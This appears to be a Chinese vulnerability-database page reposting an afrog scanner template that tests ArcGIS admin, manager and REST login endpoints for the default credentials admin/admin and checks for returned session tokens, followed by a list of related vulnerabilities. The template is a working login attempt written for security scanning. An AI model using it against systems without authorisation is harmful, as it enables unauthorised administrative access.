arcgis-default-password: ArcGis Admin/Manager/Rest Default Password

日期: 2025-09-01 | 影响软件: ArcGis Admin Manager Rest | POC: 已公开

漏洞描述

ArcGIS admin default password admin / admin

PoC代码[已公开]

id: arcgis-default-password

info:
  name: ArcGis Admin/Manager/Rest Default Password
  author: zan8in
  severity: high
  verified: true
  description: ArcGIS admin default password  admin / admin
  tags: arcgis,admin,defaultpassword

rules:
  r0:
    request:
      method: POST
      path: /arcgis/admin/login?redirect=
      body: |
        password=50f9095ae55d9c0c64b218b961e477475b908c5718142f02a10feac18915f6bd062a7d1c7305649f23992bf1c2e71a6e84293c46afd9b2d57364f77ef14f6095&username=66ebb130d91c4614dc01ed00809fdb613910ffb770da1b2dc1661769348e2344f17df8b6c14cbca70bf5b843cf04fcc9b799bd000b44915b358f0498b666b4f3&encrypted=true
    expression: response.status == 302 && response.raw_header.bcontains(b"/arcgis/admin") && response.raw_header.bcontains(b"AGS_ADMIN_TOKEN")
    extractors:
      - type: word
        extractor:
          user: 'admin'
          pass: "admin"
  r1:
    request:
      method: POST
      path: /arcgis/admin/generateToken
      body: |
        request=826841e7ba750ea698adb7ca058691a923b5530e08e2f9b81568b2ea858b8c2e8f14c632d6caae2a73cc113feed85069c4d7dcbaa9281c014304c8a7a55728dc&username=1d0bb95c735e50a26ef38ff8b5f7037b37cb59ef4058f2da9c0f449528225bacdf9186d8565862c962878c34d8afd87a3a99d5a095d540289a0b3d5d5c562620&password=6e8253afa39de6dadee3343b6e84005998b3f7421d5f519143945ef6a1f29d46c35f3fe7aa322a365f22a3cbb588412f2932a5a1a211b7373a3c987e990d17f3&expiration=4f69339bbeff68147fedbc07fa01a333c9a80556e4353e064c2672e30b1d0ba510a617463a28eb359390722d812e2143b6dc4e8cad6d3cd28e308f90539c6b76&referer=39ab8670c8f7b5fa4db0b81d8ae8444c8b856b2bc5ffddf982896e916f01f99ad3195c3dd81580565b67c27b788435d9fddd2d737c24fdcaa54f70b747fd06fe&client=08a2db040b42ede7b6f422bfaef67d207e4c6cb721c54baf32bd4cee6c3dd55511d7c3245190db4be648813b3f7fcea0ed976efe7e02ddb2ea11d4e5d4dc65a7&f=json&encrypted=true
    expression: response.status == 200 && response.body.bcontains(b'"token":') && response.body.bcontains(b'"expires":')
    extractors:
      - type: word
        extractor:
          user: 'admin'
          pass: "admin"
  r2:
    request:
      method: POST
      path: /arcgis/rest/login
      body: |
        username=admin&password=35fbd03ddf1dfb560ccbeab750a3e2ae7be3537322f424160907157f2d8d1bdcacce094a43043e727a5edf732fbca9e041d8d0a87f088ba41a55ca88562342f6&redirect=&encrypted=true
    expression: response.status == 302 && response.raw_header.bcontains(b"/arcgis/rest/services") && response.raw_header.bcontains(b"agstoken=")
    extractors:
      - type: word
        extractor:
          user: 'admin'
          pass: "admin"
expression: r0() || r1() || r2()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/default-pwd/arcgis-default-password.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

D-Link DIR-645 命令注入漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

万户OA freemarkeService 远程命令执行漏洞 无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC

D-Link DIR-645 命令注入漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC

万户OA freemarkeService 远程命令执行漏洞无POC